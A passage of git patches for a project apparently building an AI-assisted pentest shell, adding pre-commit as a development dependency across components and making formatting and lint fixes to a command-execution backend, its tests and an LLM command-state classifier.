+sdist = { url = "https://files.pythonhosted.org/packages/0a/10/c23352565a6544bdc5353e0b15fc1c563352101f30e24bf500207a54df9a/filelock-3.18.0.tar.gz", hash = "sha256:adbc88eabb99d2fec8c9c1b229b171f18afa655400173ddc653d5d01501fb9f2", size = 18075 }
+wheels = [
+    { url = "https://files.pythonhosted.org/packages/4d/36/2a115987e2d8c300a974597416d9de88f2444426de9571f4b59b2cca3acc/filelock-3.18.0-py3-none-any.whl", hash = "sha256:c401f4f8377c4464e6db25fff06205fd89bdd83b65eb0488ed1b160f780e21de", size = 16215 },
+]
+
 [[package]]
 name = "graphviz"
 version = "0.20.3"
@@ -245,6 +272,15 @@ wheels = [
     { url = "https://files.pythonhosted.org/packages/2a/39/e50c7c3a983047577ee07d2a9e53faf5a69493943ec3f6a384bdc792deb2/httpx-0.28.1-py3-none-any.whl", hash = "sha256:d909fcccc110f8c7faf814ca82a9a4d816bc5a6dbfea25d6591d6985b8ba59ad", size = 73517 },
 ]
 
+[[package]]
+name = "identify"
+version = "2.6.12"
+source = { registry = "https://pypi.org/simple" }
+sdist = { url = "https://files.pythonhosted.org/packages/a2/88/d193a27416618628a5eea64e3223acd800b40749a96ffb322a9b55a49ed1/identify-2.6.12.tar.gz", hash = "sha256:d8de45749f1efb108badef65ee8386f0f7bb19a7f26185f74de6367bffbaf0e6", size = 99254 }
+wheels = [
+    { url = "https://files.pythonhosted.org/packages/7a/cd/18f8da995b658420625f7ef13f037be53ae04ec5ad33f9b718240dcfd48c/identify-2.6.12-py2.py3-none-any.whl", hash = "sha256:ad9672d5a72e0d2ff7c5c8809b62dfa60458626352fb0eb7b55e69bdc45334a2", size = 99145 },
+]
+
 [[package]]
 name = "idna"
 version = "3.10"
@@ -375,6 +411,15 @@ wheels = [
     { url = "https://files.pythonhosted.org/packages/53/fc/31046fb293e5549a41fda5b6ff56fc0d46d2b7ed7dd8206fd20e3fb21e1b/langsmith-0.3.34-py3-none-any.whl", hash = "sha256:5927d726a78dbd1aa387be024ab76efa67444aec9b21b14c1de8214a233bb166", size = 358906 },
 ]
 
+[[package]]
+name = "nodeenv"
+version = "1.9.1"
+source = { registry = "https://pypi.org/simple" }
+sdist = { url = "https://files.pythonhosted.org/packages/43/16/fc88b08840de0e0a72a2f9d8c6bae36be573e475a6326ae854bcc549fc45/nodeenv-1.9.1.tar.gz", hash = "sha256:6ec12890a2dab7946721edbfbcd91f3319c6ccc9aec47be7c7e6b7011ee6645f", size = 47437 }
+wheels = [
+    { url = "https://files.pythonhosted.org/packages/d2/1d/1b658dbd2b9fa9c4c9f32accbfc0205d532c8c6194dc0f2a4c0428e7128a/nodeenv-1.9.1-py2.py3-none-any.whl", hash = "sha256:ba11c9782d29c27c70ffbdda2d7415098754709be8a7056d79a737cd901155c9", size = 22314 },
+]
+
 [[package]]
 name = "orjson"
 version = "3.10.16"
@@ -486,6 +531,15 @@ wheels = [
     { url = "https://files.pythonhosted.org/packages/88/ef/eb23f262cca3c0c4eb7ab1933c3b1f03d021f2c48f54763065b6f0e321be/packaging-24.2-py3-none-any.whl", hash = "sha256:09abb1bccd265c01f4a3aa3f7a7db064b36514d2cba19a2f694fe6150451a759", size = 65451 },
 ]
 
+[[package]]
+name = "platformdirs"
+version = "4.3.8"
+source = { registry = "https://pypi.org/simple" }
+sdist = { url = "https://files.pythonhosted.org/packages/fe/8b/3c73abc9c759ecd3f1f7ceff6685840859e8070c4d947c93fae71f6a0bf2/platformdirs-4.3.8.tar.gz", hash = "sha256:3d512d96e16bcb959a814c9f348431070822a6496326a4be0911c40b5a74c2bc", size = 21362 }
+wheels = [
+    { url = "https://files.pythonhosted.org/packages/fe/39/979e8e21520d4e47a0bbe349e2713c0aac6f3d853d0e5b34d76206c439aa/platformdirs-4.3.8-py3-none-any.whl", hash = "sha256:ff7059bb7eb1179e2685604f4aaf157cfd9535242bd23742eadc3c13542139b4", size = 18567 },
+]
+
 [[package]]
 name = "pluggy"
 version = "1.5.0"
@@ -495,6 +549,22 @@ wheels = [
     { url = "https://files.pythonhosted.org/packages/88/5f/e351af9a41f866ac3f1fac4ca0613908d9a41741cfcf2228f4ad853b697d/pluggy-1.5.0-py3-none-any.whl", hash = "sha256:44e1ad92c8ca002de6377e165f3e0f1be63266ab4d554740532335b9d75ea669", size = 20556 },
 ]
 
+[[package]]
+name = "pre-commit"
+version = "4.2.0"
+source = { registry = "https://pypi.org/simple" }
+dependencies = [
+    { name = "cfgv" },
+    { name = "identify" },
+    { name = "nodeenv" },
+    { name = "pyyaml" },
+    { name = "virtualenv" },
+]
+sdist = { url = "https://files.pythonhosted.org/packages/08/39/679ca9b26c7bb2999ff122d50faa301e49af82ca9c066ec061cfbc0c6784/pre_commit-4.2.0.tar.gz", hash = "sha256:601283b9757afd87d40c4c4a9b2b5de9637a8ea02eaff7adc2d0fb4e04841146", size = 193424 }
+wheels = [
+    { url = "https://files.pythonhosted.org/packages/88/74/a88bf1b1efeae488a0c0b7bdf71429c313722d1fc0f377537fbe554e6180/pre_commit-4.2.0-py2.py3-none-any.whl", hash = "sha256:a009ca7205f1eb497d10b845e52c838a98b6cdd2102a6c8e4540e94ee75c58bd", size = 220707 },
+]
+
 [[package]]
 name = "pycparser"
 version = "2.22"
@@ -827,6 +897,20 @@ wheels = [
     { url = "https://files.pythonhosted.org/packages/6b/11/cc635220681e93a0183390e26485430ca2c7b5f9d33b15c74c2861cb8091/urllib3-2.4.0-py3-none-any.whl", hash = "sha256:4e16665048960a0900c702d4a66415956a584919c03361cac9f1df5c5dd7e813", size = 128680 },
 ]
 
+[[package]]
+name = "virtualenv"
+version = "20.31.2"
+source = { registry = "https://pypi.org/simple" }
+dependencies = [
+    { name = "distlib" },
+    { name = "filelock" },
+    { name = "platformdirs" },
+]
+sdist = { url = "https://files.pythonhosted.org/packages/56/2c/444f465fb2c65f40c3a104fd0c495184c4f2336d65baf398e3c75d72ea94/virtualenv-20.31.2.tar.gz", hash = "sha256:e10c0a9d02835e592521be48b332b6caee6887f332c111aa79a09b9e79efc2af", size = 6076316 }
+wheels = [
+    { url = "https://files.pythonhosted.org/packages/f3/40/b1c265d4b2b62b58576588510fc4d1fe60a86319c8de99fd8e9fec617d2c/virtualenv-20.31.2-py3-none-any.whl", hash = "sha256:36efd0d9650ee985f0cad72065001e66d49a6f24eb44d98980f630686243cf11", size = 6057982 },
+]
+
 [[package]]
 name = "wish-tools"
 version = "0.1.0"
@@ -841,6 +925,7 @@ dependencies = [
 dev = [
     { name = "factory-boy" },
     { name = "graphviz" },
+    { name = "pre-commit" },
     { name = "pytest" },
     { name = "pytest-asyncio" },
     { name = "ruff" },
@@ -857,6 +942,7 @@ requires-dist = [
 dev = [
     { name = "factory-boy", specifier = ">=3.3.1" },
     { name = "graphviz", specifier = ">=0.20.1" },
+    { name = "pre-commit", specifier = ">=3.6.0" },
     { name = "pytest", specifier = ">=8.3.4" },
     { name = "pytest-asyncio", specifier = ">=0.25.2" },
     { name = "ruff", specifier = ">=0.9.8" },

From be97b60b9fa99fd34e8528d115ac5e5333055d93 Mon Sep 17 00:00:00 2001
From: Sho Nakatani <lay.sakura@gmail.com>
Date: Fri, 30 May 2025 06:46:39 +0900
Subject: [PATCH 3/4] feat: add pre-commit as a development dependency across
 multiple components

---
 wish-api/uv.lock                              |  1 +
 .../wish_command_execution/backend/bash.py    |  5 ++---
 .../tests/backend/test_bash_backend.py        | 20 +++++++++++-------
 wish-command-execution/uv.lock                |  1 +
 wish-command-generation-api/uv.lock           |  1 +
 .../nodes/command_state_classifier.py         | 21 ++++++++++---------
 wish-sh/uv.lock                               |  1 +
 7 files changed, 29 insertions(+), 21 deletions(-)

diff --git a/wish-api/uv.lock b/wish-api/uv.lock
index e2d6582..0ee7b54 100644
--- a/wish-api/uv.lock
+++ b/wish-api/uv.lock
@@ -2954,6 +2954,7 @@ requires-dist = [
 dev = [
     { name = "factory-boy", specifier = ">=3.3.1" },
     { name = "graphviz", specifier = ">=0.20.1" },
+    { name = "pre-commit", specifier = ">=3.6.0" },
     { name = "pytest", specifier = ">=8.3.4" },
     { name = "pytest-asyncio", specifier = ">=0.25.2" },
     { name = "ruff", specifier = ">=0.9.8" },
diff --git a/wish-command-execution/src/wish_command_execution/backend/bash.py b/wish-command-execution/src/wish_command_execution/backend/bash.py
index 96cf966..cceafee 100644
--- a/wish-command-execution/src/wish_command_execution/backend/bash.py
+++ b/wish-command-execution/src/wish_command_execution/backend/bash.py
@@ -128,7 +128,6 @@ async def execute_command(self, wish: Wish, command: str, cmd_num: int, log_file
             cmd_num: The command number.
             log_files: The log files to write output to.
             timeout_sec: The timeout in seconds for this command.
-            
         Note:
             Commands are executed in the working directory /app/{run_id}/ to isolate
             command execution from the application source code.
@@ -145,11 +144,11 @@ async def execute_command(self, wish: Wish, command: str, cmd_num: int, log_file
             try:
                 # 作業ディレクトリを設定
                 cwd = f"/app/{self.run_id or wish.id}/"
-                
+
                 # ディレクトリが存在することを確認
                 import os
                 os.makedirs(cwd, exist_ok=True)
-                
+
                 # Start the process (this is still synchronous, but the interface is async)
                 process = subprocess.Popen(
                     command,
diff --git a/wish-command-execution/tests/backend/test_bash_backend.py b/wish-command-execution/tests/backend/test_bash_backend.py
index 4971980..2778b8c 100644
--- a/wish-command-execution/tests/backend/test_bash_backend.py
+++ b/wish-command-execution/tests/backend/test_bash_backend.py
@@ -60,10 +60,10 @@ async def test_execute_command(self, mock_makedirs, mock_open, mock_popen, backe
 
         # Expected working directory
         expected_cwd = f"/app/{backend.run_id or wish.id}/"
-        
+
         # Verify that os.makedirs was called to ensure the directory exists
         mock_makedirs.assert_called_once_with(expected_cwd, exist_ok=True)
-        
+
         # Verify that Popen was called with the expected command and cwd
         mock_popen.assert_any_call(
             cmd,
@@ -87,7 +87,9 @@ async def test_execute_command(self, mock_makedirs, mock_open, mock_popen, backe
     @patch("subprocess.Popen")
     @patch("builtins.open")
     @patch("os.makedirs")
-    async def test_execute_command_subprocess_error(self, mock_makedirs, mock_open, mock_popen, backend, wish, log_files):
+    async def test_execute_command_subprocess_error(
+        self, mock_makedirs, mock_open, mock_popen, backend, wish, log_files
+    ):
         """Test execute_command method with subprocess error."""
         # Set up the mock Popen to raise a subprocess error
         mock_popen.side_effect = subprocess.SubprocessError("Mock error")
@@ -102,10 +104,10 @@ async def test_execute_command_subprocess_error(self, mock_makedirs, mock_open,
         cmd_num = 1
         timeout_sec = 60
         await backend.execute_command(wish, cmd, cmd_num, log_files, timeout_sec)
-        
+
         # Expected working directory
         expected_cwd = f"/app/{backend.run_id or wish.id}/"
-        
+
         # Verify that os.makedirs was called to ensure the directory exists
         mock_makedirs.assert_called_once_with(expected_cwd, exist_ok=True)
 
@@ -193,7 +195,9 @@ async def test_cancel_command_not_running(self, backend, wish):
     @patch("subprocess.Popen")
     @patch("builtins.open")
     @patch("os.makedirs")
-    async def test_execute_command_without_variable_replacement(self, mock_makedirs, mock_open, mock_popen, backend, wish, log_files):
+    async def test_execute_command_without_variable_replacement(
+        self, mock_makedirs, mock_open, mock_popen, backend, wish, log_files
+    ):
         """Test execute_command method without variable replacement."""
         # Set up the mock Popen
         mock_process = MagicMock()
@@ -212,10 +216,10 @@ async def test_execute_command_without_variable_replacement(self, mock_makedirs,
 
         # Expected working directory
         expected_cwd = f"/app/{backend.run_id or wish.id}/"
-        
+
         # Verify that os.makedirs was called to ensure the directory exists
         mock_makedirs.assert_called_once_with(expected_cwd, exist_ok=True)
-        
+
         # Verify that Popen was called with the original command and correct cwd
         mock_popen.assert_any_call(
             cmd,
diff --git a/wish-command-execution/uv.lock b/wish-command-execution/uv.lock
index af9d1ef..37938da 100644
--- a/wish-command-execution/uv.lock
+++ b/wish-command-execution/uv.lock
@@ -1046,6 +1046,7 @@ requires-dist = [
 dev = [
     { name = "factory-boy", specifier = ">=3.3.1" },
     { name = "graphviz", specifier = ">=0.20.1" },
+    { name = "pre-commit", specifier = ">=3.6.0" },
     { name = "pytest", specifier = ">=8.3.4" },
     { name = "pytest-asyncio", specifier = ">=0.25.2" },
     { name = "ruff", specifier = ">=0.9.8" },
diff --git a/wish-command-generation-api/uv.lock b/wish-command-generation-api/uv.lock
index 1e3ed98..e8baf93 100644
--- a/wish-command-generation-api/uv.lock
+++ b/wish-command-generation-api/uv.lock
@@ -3079,6 +3079,7 @@ requires-dist = [
 dev = [
     { name = "factory-boy", specifier = ">=3.3.1" },
     { name = "graphviz", specifier = ">=0.20.1" },
+    { name = "pre-commit", specifier = ">=3.6.0" },
     { name = "pytest", specifier = ">=8.3.4" },
     { name = "pytest-asyncio", specifier = ">=0.25.2" },
     { name = "ruff", specifier = ">=0.9.8" },
diff --git a/wish-log-analysis-api/src/wish_log_analysis_api/nodes/command_state_classifier.py b/wish-log-analysis-api/src/wish_log_analysis_api/nodes/command_state_classifier.py
index bc28227..4a4fa9d 100644
--- a/wish-log-analysis-api/src/wish_log_analysis_api/nodes/command_state_classifier.py
+++ b/wish-log-analysis-api/src/wish_log_analysis_api/nodes/command_state_classifier.py
@@ -2,7 +2,7 @@
 
 import os
 
-from langchain_core.output_parsers import StrOutputParser, JsonOutputParser
+from langchain_core.output_parsers import JsonOutputParser
 from langchain_core.prompts import PromptTemplate
 from langchain_openai import ChatOpenAI
 from wish_models.command_result.command_state import CommandState
@@ -104,7 +104,7 @@
   "reason": "Detailed explanation of why this state was chosen"
 }}
 
-Where STATE_HERE is one of: SUCCESS_INITIAL_ACCESS, SUCCESS, COMMAND_NOT_FOUND, FILE_NOT_FOUND, 
+Where STATE_HERE is one of: SUCCESS_INITIAL_ACCESS, SUCCESS, COMMAND_NOT_FOUND, FILE_NOT_FOUND,
 REMOTE_OPERATION_FAILED, TIMEOUT, NETWORK_ERROR, or OTHERS.
 
 Example output:
@@ -138,6 +138,7 @@ def classify_command_state(state: GraphState, settings_obj: Settings) -> GraphSt
     """
     import json
     import logging
+
     from wish_tools.tool_step_trace import main as step_trace
 
     # Create a new state object to avoid modifying the original
@@ -170,8 +171,8 @@ def classify_command_state(state: GraphState, settings_obj: Settings) -> GraphSt
 
     # Initialize the OpenAI model
     model = ChatOpenAI(
-        model=settings_obj.OPENAI_MODEL, 
-        api_key=settings_obj.OPENAI_API_KEY, 
+        model=settings_obj.OPENAI_MODEL,
+        api_key=settings_obj.OPENAI_API_KEY,
         use_responses_api=True,
         model_kwargs={"response_format": {"type": "json_object"}}
     )
@@ -189,18 +190,18 @@ def classify_command_state(state: GraphState, settings_obj: Settings) -> GraphSt
         try:
             command_state_str = classification_data.get("command_state")
             reason = classification_data.get("reason", "No reason provided")
-            
+
             # Log the classification result and reason
             logging.info(f"Command state classification: {command_state_str}")
             logging.info(f"Reason: {reason}")
-            
+
             # Send to StepTrace if run_id is available
             if state.run_id:
                 trace_message = json.dumps({
                     "command_state": command_state_str,
                     "reason": reason
                 }, ensure_ascii=False)
-                
+
                 try:
                     step_trace(
                         run_id=state.run_id,
@@ -210,7 +211,7 @@ def classify_command_state(state: GraphState, settings_obj: Settings) -> GraphSt
                     logging.info(f"StepTrace sent for run_id: {state.run_id}")
                 except Exception as trace_error:
                     logging.error(f"Error sending StepTrace: {str(trace_error)}")
-            
+
             # Convert the classification string to CommandState
             if command_state_str == "SUCCESS_INITIAL_ACCESS":
                 command_state = CommandState.SUCCESS_INITIAL_ACCESS
@@ -230,11 +231,11 @@ def classify_command_state(state: GraphState, settings_obj: Settings) -> GraphSt
                 command_state = CommandState.OTHERS
             else:
                 raise ValueError(f"Unknown command state classification: {command_state_str}")
-                
+
         except Exception as json_error:
             logging.error(f"Failed to process JSON response: {classification_data}")
             logging.error(f"Error: {str(json_error)}")
-            raise ValueError(f"Invalid JSON response from LLM: {str(json_error)}")
+            raise ValueError(f"Invalid JSON response from LLM: {str(json_error)}") from json_error
 
         # Set the command state and reason in the new state
         new_state.command_state = command_state
diff --git a/wish-sh/uv.lock b/wish-sh/uv.lock
index 3d31d94..d4a0831 100644
--- a/wish-sh/uv.lock
+++ b/wish-sh/uv.lock
@@ -1240,6 +1240,7 @@ requires-dist = [
 dev = [
     { name = "factory-boy", specifier = ">=3.3.1" },
     { name = "graphviz", specifier = ">=0.20.1" },
+    { name = "pre-commit", specifier = ">=3.6.0" },
     { name = "pytest", specifier = ">=8.3.4" },
     { name = "pytest-asyncio", specifier = ">=0.25.2" },
     { name = "ruff", specifier = ">=0.9.8" },

From 41d75afb4b6d43b0e5e2071f0a41ded59ef0f61b Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Thu, 29 May 2025 21:47:20 +0000
Subject: [PATCH 4/4] docs: update graph visualization

---
 wish-log-analysis-api/docs/graph.svg | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/wish-log-analysis-api/docs/graph.svg b/wish-log-analysis-api/docs/graph.svg
index 5442acb..f173a31 100644
--- a/wish-log-analysis-api/docs/graph.svg
+++ b/wish-log-analysis-api/docs/graph.svg
@@ -22,7 +22,7 @@
 <text text-anchor="middle" x="424.89" y="-14.3" font-family="Times,serif" font-size="14.00">command_state_classifier</text>
 </g>
 <!-- log_summarization&#45;&gt;command_state_classifier -->
-<g id="edge1" class="edge">
+<g id="edge4" class="edge">
 <title>log_summarization&#45;&gt;command_state_classifier</title>
 <path fill="none" stroke="black" d="M289.43,-18C297.79,-18 306.42,-18 315.08,-18"/>
 <polygon fill="black" stroke="black" points="315.26,-21.5 325.26,-18 315.26,-14.5 315.26,-21.5"/>
@@ -34,13 +34,13 @@
 <text text-anchor="middle" x="626.39" y="-14.3" font-family="Times,serif" font-size="14.00">result_combiner</text>
 </g>
 <!-- command_state_classifier&#45;&gt;result_combiner -->
-<g id="edge2" class="edge">
+<g id="edge1" class="edge">
 <title>command_state_classifier&#45;&gt;result_combiner</title>
 <path fill="none" stroke="black" d="M524.47,-18C533.13,-18 541.79,-18 550.21,-18"/>
 <polygon fill="black" stroke="black" points="550.33,-21.5 560.33,-18 550.33,-14.5 550.33,-21.5"/>
 </g>
 <!-- __end__ -->
-<g id="node4" class="node">
+<g id="node5" class="node">
 <title>__end__</title>
 <ellipse fill="none" stroke="black" cx="773.89" cy="-18" rx="45.49" ry="18"/>
 <text text-anchor="middle" x="773.89" y="-14.3" font-family="Times,serif" font-size="14.00">__end__</text>
@@ -52,13 +52,13 @@
 <polygon fill="black" stroke="black" points="718.29,-21.5 728.29,-18 718.29,-14.5 718.29,-21.5"/>
 </g>
 <!-- __start__ -->
-<g id="node5" class="node">
+<g id="node4" class="node">
 <title>__start__</title>
 <ellipse fill="none" stroke="black" cx="50.7" cy="-18" rx="50.89" ry="18"/>
 <text text-anchor="middle" x="50.7" y="-14.3" font-family="Times,serif" font-size="14.00">__start__</text>
 </g>
 <!-- __start__&#45;&gt;log_summarization -->
-<g id="edge4" class="edge">
+<g id="edge2" class="edge">
 <title>__start__&#45;&gt;log_summarization</title>
 <path fill="none" stroke="black" d="M101.66,-18C109.8,-18 118.44,-18 127.15,-18"/>
 <polygon fill="black" stroke="black" points="127.39,-21.5 137.39,-18 127.39,-14.5 127.39,-21.5"/>